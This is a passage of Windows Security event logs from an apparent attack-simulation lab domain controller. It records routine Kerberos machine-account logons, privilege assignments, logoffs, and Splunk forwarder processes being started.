ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264629
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83F5D8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53518
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264628
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83F5D8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:25:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264631
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264633
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264632
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1098
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264634
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1370
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264636
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264635
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264637
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1660
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264638
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB2E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:25:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264641
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x842FC9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:25:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264640
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x842FC9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53531
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:25:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264639
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x842FC9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:26:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264642
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x344
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264644
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264643
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264645
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264646
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1588
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264648
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1458
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264647
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264651
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84798D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264650
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84798D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53548
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264649
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84798D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:27:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264652
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
